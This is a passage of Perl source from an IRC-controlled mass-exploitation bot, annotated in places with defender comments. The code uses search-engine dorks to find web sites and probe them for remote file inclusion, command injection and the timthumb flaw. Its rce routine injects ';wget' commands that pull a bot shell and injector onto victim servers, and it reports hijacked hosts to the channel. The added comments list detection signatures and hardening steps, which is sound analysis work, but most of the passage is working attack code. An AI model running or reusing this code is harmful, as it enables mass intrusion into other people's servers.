       #  - scan_start() calls this as &type($chan,$bug,$dork,"<EngineName>",$type),
       #    so $engine here is a single engine label and the code is whatever
       #    the IRC command handlers passed to scan_start() as last argument:
       #    1 = RFI handler, 2 = LFIRCE, 3 = e107, 4 = XML, 5 = SQL, 6 = OSCO,
       #    8 and 9 = CPANEL, 10 = PhpMyAdmin, 11 = OPENCART, 12 = ZEN,
       #    16 = tim RFI, 17 = RCE, 18 = zBoard.
       #  - Code 14 is handed to lfd_start(), whose body is not in view;
       #    presumably it reaches this sub the same way -- confirm.
       #  - The empty prototype "()" declares zero arguments although five are
       #    unpacked from @_; the visible calls use the &type(...) form, which
       #    bypasses prototype checking.
       #  - Codes 7, 13 and 15 are commented out. Those, and any other value,
       #    match no branch, so no routine is called.
       #  - The callees (rfi, lfi, e107, ...) are defined outside this excerpt;
       #    nothing is asserted here about what they do.
       #  - NOTE(review): when comparing variants of this script, this table
       #    is a compact place to see which scan routines are wired in.
  704. my ($chan,$bug,$dork,$engine,$type) = @_;
               # Each branch overwrites $type with the callee's return value.
  705.         if ($type == 1){$type=&rfi($chan,$bug,$dork,$engine);}
  706.         elsif ($type == 2){$type=&lfi($chan,$bug,$dork,$engine);}
  707.         elsif ($type == 3){$type=&e107($chan,$bug,$dork,$engine);}
  708.         elsif ($type == 4){$type=&xml($chan,$bug,$dork,$engine);}
  709.         elsif ($type == 5){$type=&sql($chan,$bug,$dork,$engine);}
  710.         elsif ($type == 6){$type=&oscommerce($chan,$bug,$dork,$engine);}
  711.         #elsif ($type == 7){$type=&osco2($chan,$bug,$dork,$engine);}
  712.         elsif ($type == 8){$type=&cpanel($chan,$bug,$dork,$engine);}
  713.         elsif ($type == 9){$type=&cpanel2($chan,$bug,$dork,$engine);}
  714.         elsif ($type == 10){$type=&adm($chan,$bug,$dork,$engine);}
  715.         elsif ($type == 11){$type=&op($chan,$bug,$dork,$engine);}
  716.         elsif ($type == 12){$type=&zen($chan,$bug,$dork,$engine);}
  717.         #elsif ($type == 13){$type=&osco3($chan,$bug,$dork,$engine);}
  718.         elsif ($type == 14){$type=&lfd($chan,$bug,$dork,$engine);}
  719.         #elsif ($type == 15){$type=&osco4($chan,$bug,$dork,$engine);}
  720.         elsif ($type == 16){$type=&timrfi($chan,$bug,$dork,$engine);}
  721.         elsif ($type == 17){$type=&rce($chan,$bug,$dork,$engine);}
  722.         elsif ($type == 18){$type=&zboard($chan,$bug,$dork,$engine);}
  723. }
  724. sub scan_start() {
  725. my ($chan,$bug,$dork,$engine,$type) = @_;
  726.     if ($engine =~ /google/i) {
  727.         if (my $pid = fork) { waitpid($pid, 0); }
  728.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Google",$type); } exit; }
  729.     }
  730.     if ($engine =~ /google2/i) {
  731.         if ($pid = fork) { waitpid($pid, 0); }
  732.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Google2",$type); } exit; }
  733.     }
  734.         if ($engine =~ /gigablast/i) {
  735.         if ($pid = fork) { waitpid($pid, 0); }
  736.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GigaBlast",$type); } exit; }
  737.     }
  738.         if ($engine =~ /euroseek/i) {
  739.         if ($pid = fork) { waitpid($pid, 0); }
  740.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"EuroSeek",$type); } exit; }
  741.     }
  742.         if ($engine =~ /alltheweb/i) {
  743.         if ($pid = fork) { waitpid($pid, 0); }
  744.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Alltheweb",$type); } exit; }
  745.     }
  746.     if ($engine =~ /bing/i) {
  747.         if ($pid = fork) { waitpid($pid, 0); }
  748.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bing",$type); } exit; }
  749.     }
  750.     if ($engine =~ /altavista/i) {
  751.         if ($pid = fork) { waitpid($pid, 0); }
  752.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Altavista",$type); } exit; }
  753.     }
  754.     if ($engine =~ /ask/i) {
  755.         if ($pid = fork) { waitpid($pid, 0); }
  756.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Ask",$type); } exit; }
  757.     }
  758.     if ($engine =~ /uol/i) {
  759.         if ($pid = fork) { waitpid($pid, 0); }
  760.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Uol",$type); } exit; }
  761.     }
  762.     if ($engine =~ /yahoo/i) {
  763.         if ($pid = fork) { waitpid($pid, 0); }
  764.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yahoo",$type); } exit; }
  765.     }
  766.         if ($engine =~ /yahoo2/i) {
  767.         if ($pid = fork) { waitpid($pid, 0); }
  768.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yahoo2",$type); } exit; }
  769.     }
  770.     if ($engine =~ /clusty/i) {
  771.         if ($pid = fork) { waitpid($pid, 0); }
  772.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Clusty",$type); } exit; }
  773.     }
  774.     if ($engine =~ /gutser/i) {
  775.         if ($pid = fork) { waitpid($pid, 0); }
  776.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Gutser",$type); } exit; }
  777.     }
  778.     if ($engine =~ /rediff/i) {
  779.         if ($pid = fork) { waitpid($pid, 0); }
  780.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Rediff",$type); } exit; }
  781.     }
  782.         if ($engine =~ /mamma/i) {
  783.         if ($pid = fork) { waitpid($pid, 0); }
  784.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Mamma",$type); } exit; }
  785.     }
  786.     if ($engine =~ /virgilio/i) {
  787.         if ($pid = fork) { waitpid($pid, 0); }
  788.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Virgilio",$type); } exit; }
  789.     }
  790.     if ($engine =~ /webde/i) {
  791.         if ($pid = fork) { waitpid($pid, 0); }
  792.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Webde",$type); } exit; }
  793.     }
  794.     if ($engine =~ /exalead/i) {
  795.         if ($pid = fork) { waitpid($pid, 0); }
  796.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Exalead",$type); } exit; }
  797.     }
  798.     if ($engine =~ /lycos/i) {
  799.         if ($pid = fork) { waitpid($pid, 0); }
  800.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Lycos",$type); } exit; }
  801.     }
  802.     if ($engine =~ /hotbot/i) {
  803.         if ($pid = fork) { waitpid($pid, 0); }
  804.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Hotbot",$type); } exit; }
  805.     }
  806.     if ($engine =~ /aol/i) {
  807.         if ($pid = fork) { waitpid($pid, 0); }
  808.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Aol",$type); } exit; }
  809.     }
  810.     if ($engine =~ /sapo/i) {
  811.         if ($pid = fork) { waitpid($pid, 0); }
  812.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Sapo",$type); } exit; }
  813.     }
  814.     if ($engine =~ /duck/i) {
  815.         if ($pid = fork) { waitpid($pid, 0); }
  816.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Duck",$type); } exit; }
  817.     }
  818.     if ($engine =~ /yause/i) {
  819.         if ($pid = fork) { waitpid($pid, 0); }
  820.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yause",$type); } exit; }
  821.     }
  822.     if ($engine =~ /baidu/i) {
  823.         if ($pid = fork) { waitpid($pid, 0); }
  824.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Baidu",$type); } exit; }
  825.     }
  826.     if ($engine =~ /black/i) {
  827.         if ($pid = fork) { waitpid($pid, 0); }
  828.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Black",$type); } exit; }
  829.     }
  830.         if ($engine =~ /onet/i) {
  831.         if ($pid = fork) { waitpid($pid, 0); }
  832.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Onet",$type); } exit; }
  833.     }
  834.         if ($engine =~ /sizuka/i) {
  835.         if ($pid = fork) { waitpid($pid, 0); }
  836.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Sizuka",$type); } exit; }
  837.     }
  838.         if ($engine =~ /walla/i) {
  839.         if ($pid = fork) { waitpid($pid, 0); }
  840.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Walla",$type); } exit; }
  841.     }
  842.         if ($engine =~ /demos/i) {
  843.         if ($pid = fork) { waitpid($pid, 0); }
  844.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Demos",$type); } exit; }
  845.     }
  846.         if ($engine =~ /rose/i) {
  847.         if ($pid = fork) { waitpid($pid, 0); }
  848.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Rose",$type); } exit; }
  849.     }
  850.         if ($engine =~ /seznam/i) {
  851.         if ($pid = fork) { waitpid($pid, 0); }
  852.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Seznam",$type); } exit; }
  853.     }
  854.         if ($engine =~ /tiscali/i) {
  855.         if ($pid = fork) { waitpid($pid, 0); }
  856.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tiscali",$type); } exit; }
  857.     }
  858.         if ($engine =~ /naver/i) {
  859.         if ($pid = fork) { waitpid($pid, 0); }
  860.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Naver",$type); } exit; }
  861.     }  
  862.         if ($engine =~ /amidalla/i) {
  863.         if ($pid = fork) { waitpid($pid, 0); }
  864.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AmiDalLa",$type); } exit; }
  865.     }
  866.         if ($engine =~ /buscar/i) {
  867.         if ($pid = fork) { waitpid($pid, 0); }
  868.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BusCaR",$type); } exit; }
  869.     }
  870.         if ($engine =~ /kvasir/i) {
  871.         if ($pid = fork) { waitpid($pid, 0); }
  872.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KvaSiR",$type); } exit; }
  873.     }
  874.         if ($engine =~ /excite/i) {
  875.         if ($pid = fork) { waitpid($pid, 0); }
  876.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"eXciTe",$type); } exit; }
  877.     }
  878.         if ($engine =~ /interia/i) {
  879.         if ($pid = fork) { waitpid($pid, 0); }
  880.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"InteRia",$type); } exit; }
  881.     }
  882.         if ($engine =~ /snz/i) {
  883.         if ($pid = fork) { waitpid($pid, 0); }
  884.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SnZ",$type); } exit; }
  885.     }
  886.         if ($engine =~ /rambler/i) {
  887.         if ($pid = fork) { waitpid($pid, 0); }
  888.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RambLer",$type); } exit; }
  889.     }  
  890.         if ($engine =~ /yandex/i) {
  891.         if ($pid = fork) { waitpid($pid, 0); }
  892.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"YaNdeX",$type); } exit; }
  893.     }
  894.         if ($engine =~ /doogate/i) {
  895.         if ($pid = fork) { waitpid($pid, 0); }
  896.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DooGatE",$type); } exit; }
  897.     }
  898.         if ($engine =~ /sogou/i) {
  899.         if ($pid = fork) { waitpid($pid, 0); }
  900.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SoGoU",$type); } exit; }
  901.     }
  902.         if ($engine =~ /joeant/i) {
  903.         if ($pid = fork) { waitpid($pid, 0); }
  904.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JoEaNt",$type); } exit; }
  905.     }
  906.         if ($engine =~ /terra/i) {
  907.         if ($pid = fork) { waitpid($pid, 0); }
  908.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TeRrA",$type); } exit; }
  909.     }
  910.         if ($engine =~ /youdao/i) {
  911.         if ($pid = fork) { waitpid($pid, 0); }
  912.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"YoUdAo",$type); } exit; }
  913.     }
  914.         if ($engine =~ /amfibi/i) {
  915.         if ($pid = fork) { waitpid($pid, 0); }
  916.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AmFiBi",$type); } exit; }
  917.     }
  918.         if ($engine =~ /bigclique/i) {
  919.         if ($pid = fork) { waitpid($pid, 0); }
  920.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BiGcLiQuE",$type); } exit; }
  921.     }
  922.         if ($engine =~ /dancefloor/i) {
  923.         if ($pid = fork) { waitpid($pid, 0); }
  924.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"DaNcEfLoOr",$type); } exit; }
  925.     }
  926.         if ($engine =~ /rakuten/i) {
  927.         if ($pid = fork) { waitpid($pid, 0); }
  928.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RaKuTeN",$type); } exit; }
  929.     }
  930.         if ($engine =~ /nova/i) {
  931.         if ($pid = fork) { waitpid($pid, 0); }
  932.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NoVa",$type); } exit; }
  933.     }
  934.         if ($engine =~ /najdi/i) {
  935.         if ($pid = fork) { waitpid($pid, 0); }
  936.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NaJdI",$type); } exit; }
  937.     }
  938.         if ($engine =~ /goo/i) {
  939.         if ($pid = fork) { waitpid($pid, 0); }
  940.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GoO",$type); } exit; }
  941.     }
  942.         if ($engine =~ /uksubmit/i) {
  943.         if ($pid = fork) { waitpid($pid, 0); }
  944.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UkSuBmIt",$type); } exit; }
  945.     }
  946.         ###### NIEUWE ######
  947.         if ($engine =~ /netsprint/i) {
  948.         if ($pid = fork) { waitpid($pid, 0); }
  949.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NetSprint",$type); } exit; }
  950.     }
  951.         if ($engine =~ /saol/i) {
  952.         if ($pid = fork) { waitpid($pid, 0); }
  953.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"sAol",$type); } exit; }
  954.     }
  955.         if ($engine =~ /lookle/i) {
  956.                 if ($pid = fork) { waitpid($pid, 0); }
  957.                 else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Lookle",$type); } exit; }
  958.         }
  959.         if ($engine =~ /optuszoo/i) {
  960.                 if ($pid = fork) { waitpid($pid, 0); }
  961.                 else { if (fork) { exit; } else { &type($chan,$bug,$dork,"optusZoo",$type); } exit; }
  962.         }
  963.         if ($engine =~ /search66/i) {
  964.                 if ($pid = fork) { waitpid($pid, 0); }
  965.                 else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Search66",$type); } exit; }
  966.         }
  967.         if ($engine =~ /arrama/i) {
  968.         if ($pid = fork) { waitpid($pid, 0); }
  969.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Arrama",$type); } exit; }
  970.     }
  971.         if ($engine =~ /excitejp/i) {
  972.         if ($pid = fork) { waitpid($pid, 0); }
  973.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"eXciteJP",$type); } exit; }
  974.     }
  975.         if ($engine =~ /biglobe/i) {
  976.         if ($pid = fork) { waitpid($pid, 0); }
  977.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BigLobe",$type); } exit; }
  978.     }
  979.         if ($engine =~ /clix/i) {
  980.         if ($pid = fork) { waitpid($pid, 0); }
  981.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Clix",$type); } exit; }
  982.     }
  983.         if ($engine =~ /searchch/i) {
  984.         if ($pid = fork) { waitpid($pid, 0); }
  985.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SearchCH",$type); } exit; }
  986.     }
  987.         if ($engine =~ /cada/i) {
  988.                 if ($pid = fork) { waitpid($pid, 0); }
  989.                 else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cada",$type); } exit; }
  990.         }
  991.         ####################
  992. }
  993. #########################################
  994. sub rfi() {
        # Malware routine, annotated for analysts: remote-file-inclusion (RFI) probe loop.
        # Arguments: $chan, $bug, $dork, $engine. $bug is appended to every candidate
        # host to form the probed URL; the values are also passed on to search_engine(),
        # msg() and the rfia_xpl()/rfib_xpl() helpers.
        # $rfilogo, $injector and %conf are file-level variables defined outside this view.
        # Defender note: the success test below is the text "failed to open stream" in
        # the response body, which is the wording PHP uses when include()/fopen() cannot
        # open its target. Setting display_errors=Off removes that oracle and
        # allow_url_include=Off blocks the remote include itself.
  995.         my ($chan,$bug,$dork,$engine) = @_;
  996.     my $count = 0;
        # search_engine() is defined elsewhere; its result is used here as a list of
        # host/path strings that get "http://" prepended.
  997.     my @list = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
  998.     my $num = scalar(@list);
  999.     if ($num > 0) {
  1000.         foreach my $site (@list) {
  1001.             $count++;
                                # Posts a "finish" banner to the channel when the counter reaches
                                # $num-1, but only if $conf{ssdone} is 1.
  1002.                                 if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$rfilogo 12(4@0$engine12) 9==14F9=15I9=0N9=0I9=0S9=14H9=="); } }
                                # $test is the bare target URL; $coba is the same URL with $injector appended.
  1003.                                 my $coba = "http://".$site.$bug.$injector;
  1004.                                 my $test = "http://".$site.$bug;
                                # Four requests per host (GET then POST, each for $test and $coba), one
                                # second apart. Only the responses to $test are kept. This paired
                                # GET/POST cadence against one path is visible in access logs.
  1005.                                 my $ceka = &get_content($test);sleep(1); &get_content($coba);sleep(1);
  1006.                                 my $cekb = &post_content($test);sleep(1); &post_content($coba);sleep(1);
                                # A leaked include error on the GET response selects the GET helper,
                                # otherwise the POST response is checked and selects the POST helper.
  1007.                                 if ($ceka =~ /failed to open stream/i) {
  1008.                                         &rfia_xpl($test,$chan,$site,$engine);
  1009.                                 }
  1010.                                 elsif ($cekb =~ /failed to open stream/i) {
  1011.                                         &rfib_xpl($test,$chan,$site,$engine);
  1012.                                 }
  1013.                 }
  1014.         }
  1015. }
  1016. sub rfia_xpl() {
        # Malware routine, annotated for analysts: GET-based follow-up to rfi().
        # Arguments: $url (target URL up to the include parameter), $chan, $site, $engine.
        # $site is unpacked but not used in this sub.
        # $botshell, $injector and $rfilogo are file-level variables defined outside this view.
        # Defender note: the marker matched below ("<b>ID:</b> 0wn3d" inside a verdana
        # <font> tag) is a fixed string in the response body and therefore a usable
        # IDS/WAF response signature. On a server with allow_url_include=Off the
        # request cannot pull in the remote file.
  1017. my ($url,$chan,$site,$engine) = @_;
        # Both URLs end in "?"; presumably this turns any suffix the target script
        # appends into a query string (not verifiable from this view).
  1018. my $dor  = $url.$botshell."?";
  1019. my $test = $url.$injector."?";
  1020. my $check = &get_content($dor);
        # The response to $test is discarded; only $check is inspected.
  1021.             &get_content($test);sleep(1);
  1022.                         if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/i) {
                        # info_main() is defined elsewhere; it receives the URL that returned the marker.
  1023.                         &info_main($dor,$chan,$engine,$rfilogo);
  1024.                 }
  1025. }
  1026. sub rfib_xpl() {
        # Malware routine, annotated for analysts: POST-based twin of rfia_xpl().
        # Arguments: $url, $chan, $site, $engine. $site is unpacked but not used here.
        # The only difference from rfia_xpl() is that both requests go through
        # post_content() instead of get_content().
        # Defender note: POST bodies are absent from default access logs, so catching
        # this variant needs request-body logging or the response-side marker below.
  1027. my ($url,$chan,$site,$engine) = @_;
  1028. my $dor  = $url.$botshell."?";
  1029. my $test = $url.$injector."?";
  1030. my $check = &post_content($dor);
        # The response to $test is discarded; only $check is inspected.
  1031.             &post_content($test);sleep(1);
  1032.                         if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/i) {
                        # info_main() is defined elsewhere; it receives the URL that returned the marker.
  1033.                         &info_main($dor,$chan,$engine,$rfilogo);
  1034.                 }
  1035. }
  1036. ######################## RCE
  1037. sub rce() {
        # Malware routine, annotated for analysts: command-injection probe loop.
        # Arguments: $chan, $bug, $dork, $engine, used the same way as in rfi().
        # $rfilogo, $rcelogo, $botshell, $injector and %conf are file-level variables
        # defined outside this view.
        # Defender note: every probe carries a literal ";echo '0wn3d';" or ";wget%20"
        # in the request, which makes a simple access-log/WAF signature. The target-side
        # fix is never to pass request data to a shell, and restricting outbound
        # connections from web servers blocks the wget stage.
  1038.         my ($chan,$bug,$dork,$engine) = @_;
  1039.     my $count = 0;
  1040.     my @list = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
  1041.     my $num = scalar(@list);
  1042.     if ($num > 0) {
  1043.         foreach my $site (@list) {
  1044.             $count++;
                                # Posts a "finish" banner to the channel when the counter reaches
                                # $num-1, but only if $conf{ssdone} is 1.
  1045.                                 if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$rcelogo 12(4@0$engine12) 9==14F9=15I9=0N9=0I9=0S9=14H9=="); } }
                                # $test appends a shell echo of the marker string. $coba appends two
                                # wget commands that reference $botshell and $injector.
  1046.                                 my $coba = "http://".$site.$bug.";wget%20".$botshell." && wget%20".$injector."";
  1047.                                 my $test = "http://".$site.$bug.";echo '0wn3d';";
                                # GET then POST for each URL, one second apart. Only the responses
                                # to $test are kept.
  1048.                                 my $ceka  = &get_content($test); sleep(1); &get_content($coba); sleep(1);
  1049.                                 my $cekb =  &post_content($test); sleep(1); &post_content($coba); sleep(1);
                                # Both branches make the same call: $site is passed as the first and
                                # as the third argument of rce_xpl().
  1050.                                 if ($ceka =~ /0wn3d/i) {
  1051.                                         &rce_xpl($site,$chan,$site,$engine);
  1052.                                 }
  1053.                                 elsif ($cekb =~ /0wn3d/i) {
  1054.                                         &rce_xpl($site,$chan,$site,$engine);
  1055.                                 }
  1056.                 }
  1057.         }
  1058. }
  1059.  
  1060. sub rce_xpl() {
        # Malware routine, annotated for analysts: follow-up check after rce().
        # Arguments: $url, $chan, $site, $engine. $url is unpacked but not used here.
        # The two URLs are built from $site only, with no "/" inserted before the file
        # name, so this presumably relies on $site already ending in "/".
        # Defender note: the file names h4rd.php and pb.php requested below are
        # indicators of compromise. Sweep web roots and access logs for them, and for
        # the "<b>ID:</b> 0wn3d" marker in response bodies.
  1061. my ($url,$chan,$site,$engine) = @_;
  1062. my $dor  = "http://".$site."h4rd.php";
  1063. my $test = "http://".$site."pb.php";
  1064. my $check = &get_content($dor);
        # The response to $test is discarded; only $check is inspected.
  1065.             &get_content($test);sleep(1);
  1066.                         if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/i) {
                        # Reported through info_main() with $rfilogo, the same tag the RFI helpers use.
  1067.                         &info_main($dor,$chan,$engine,$rfilogo);
  1068.                 }
  1069. }
  1070.  
  1071. ######################## timrfi
  1072. sub timrfi() {
  1073.      my ($chan,$bug,$dork,$engine) = @_;
  1074.      my $count = 0;
  1075.      my @list = search_engine($chan,$bug,$dork,$engine,$timlogo);
  1076.      my $num = scalar(@list);
  1077.      if ($num > 0) {
  1078.          foreach my $site (@list) {
  1079.              $count++;
  1080.              if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$timlogo 12(4@0$engine12) 9==14F9=15I9=0N9=0I9=0S9=14H9=="); } }
  1081.                                 my $vuln = "http://".$site.$bug;
  1082.                                        
  1083.                                 if(get_content("http://".$site.$bug."/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = ""; &get_content("http://".$site.$bug."/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1084.                                 elsif(get_content("http://".$site.$bug."includes/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "includes/"; &get_content("http://".$site.$bug."includes/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1085.                                 elsif(get_content("http://".$site.$bug."functions/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "functions/"; &get_content("http://".$site.$bug."functions/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1086.                                 elsif(get_content("http://".$site.$bug."options/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "options/"; &get_content("http://".$site.$bug."options/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1087.                                 elsif(get_content("http://".$site.$bug."scripts/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "scripts/"; &get_content("http://".$site.$bug."scripts/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1088.                                 elsif(get_content("http://".$site.$bug."modules/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "modules/"; &get_content("http://".$site.$bug."modules/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1089.                                 elsif(get_content("http://".$site.$bug."tools/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "tools/"; &get_content("http://".$site.$bug."tools/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1090.                                 elsif(get_content("http://".$site.$bug."thumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "thumb/"; &get_content("http://".$site.$bug."thumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1091.                                 elsif(get_content("http://".$site.$bug."js/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "js/"; &get_content("http://".$site.$bug."js/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1092.                                 elsif(get_content("http://".$site.$bug."lib/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/"; &get_content("http://".$site.$bug."lib/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1093.                                 elsif(get_content("http://".$site.$bug."library/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/"; &get_content("http://".$site.$bug."library/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1094.                                 elsif(get_content("http://".$site.$bug."tools/thumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "tools/thumb/"; &get_content("http://".$site.$bug."tools/thumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1095.                                 elsif(get_content("http://".$site.$bug."tools/timthumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "tools/timthumb/"; &get_content("http://".$site.$bug."tools/timthumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1096.                                 elsif(get_content("http://".$site.$bug."timthumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "timthumb/"; &get_content("http://".$site.$bug."timthumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1097.                                 elsif(get_content("http://".$site.$bug."scripts/thumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "scripts/thumb/"; &get_content("http://".$site.$bug."scripts/thumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1098.                                 elsif(get_content("http://".$site.$bug."scripts/timthumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "scripts/timthumb/"; &get_content("http://".$site.$bug."scripts/timthumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1099.                                 elsif(get_content("http://".$site.$bug."library/functions/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/functions/"; &get_content("http://".$site.$bug."library/functions/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1100.                                 elsif(get_content("http://".$site.$bug."library/timthumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/timthumb/"; &get_content("http://".$site.$bug."library/timthumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1101.                                 elsif(get_content("http://".$site.$bug."library/resource/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/resource/"; &get_content("http://".$site.$bug."library/resource/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1102.                                 elsif(get_content("http://".$site.$bug."library/thumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "library/thumb/"; &get_content("http://".$site.$bug."library/thumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1103.                                 elsif(get_content("http://".$site.$bug."lib/timthumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/timthumb/"; &get_content("http://".$site.$bug."lib/timthumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
  1104.                                 elsif(get_content("http://".$site.$bug."lib/thumb/timthumb.php?src=".$blog."sh.php") =~ /Unable to open image/i ) { my $dir = "lib/thumb/"; &get_content("http://".$site.$bug."lib/thumb/timthumb.php?src=".$blog."index.php"); &timrf($vuln,$dir,$blog,$chan,$site,$engine); }
